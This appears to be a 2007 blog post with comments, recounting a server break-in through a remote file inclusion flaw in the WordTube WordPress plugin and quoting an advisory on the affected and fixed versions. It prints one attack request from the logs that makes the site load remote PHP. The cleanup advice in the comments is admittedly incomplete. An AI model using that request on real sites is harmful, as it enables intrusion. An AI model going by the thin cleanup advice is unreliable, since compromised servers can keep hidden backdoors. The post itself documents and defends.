WordTube vulnerability broke my server
Today i woke up and upon checking my mail discovered that my server has gone down. A quick ps aux revealed some concealed processes running as ‘httpd’ but actually running some perl script. The apache2 process wasn’t running any more. After killing the intruding processes i could start apache, but of course i wanted to find out, what went wrong.
Looking through the log files i found someone trying to access /wp-content/plugins/wordtube/wordtube-button.php?wpPath=[someurl]
Turns out, wordtube was exploitable. I finally found the exploit in heise.de:
Three plugins for the popular Blog-Software Wordpress introduce a vulnerability to the system. There are security holes in myFlash, wordTube and wp-Table, whom a attacker can use to include his own php-scripts and run them with the privileges of the webserver. All three plugins are written by the same developer.
The problem in the plugins is the handling of the argument wppath in the files wordtube-button.php, js/wptable-button.php and myflash-button.php. All wordTube and wp-Table versions up until 1.4.3, myFlash versions up until 1.10 are affected. The errors have been fixed in the respective versions 1.4.4 and 1.11. All users should download the newest versions asap.
Verwandte Beiträge
Open Source, Security, wordpress | 
Omar | 13. Mai 2007
Comments
Other Links to this Post
RSS-Feed für Kommentare zu diesem Beitrag. TrackBack URI
By , 25. Mai 2007 @ 16:26
Hi,
When you cleaned up your server, what kind of files were you looking for?
I have been affectd by wordtube on one my sites as well.
Thanks
By , 25. Mai 2007 @ 16:49
@ajit: typically, look for files in /tmp/ and /var/tmp/.
A security experts would say, you’d have to redo your whole server, because the intruder could have planted whatever software really. But what i did was i checked ‘ps aux’ and it didn’t come up with any process that looked odd to me and then i basically observed the traffic and since i saw, that it wasn’t unusually high, i’m assuming the intruder weren’t able to do much harm.
Actually on my server, they simply installed a irc-bot, which took up much traffic, but other than that didn’t do *my* server much harm..